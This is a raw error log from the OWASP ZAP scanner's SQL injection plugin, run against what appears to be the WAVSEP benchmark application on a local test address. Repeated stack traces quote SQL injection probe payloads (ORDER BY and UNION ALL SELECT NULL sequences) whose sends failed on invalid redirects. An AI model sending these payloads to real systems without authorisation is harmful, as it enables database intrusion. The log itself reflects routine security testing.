org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679705 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 6654-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6654-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679705 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679706 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679707 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679708 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679709 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679709 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679710 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679711 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679712 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679713 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679714 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679714 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 3891-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 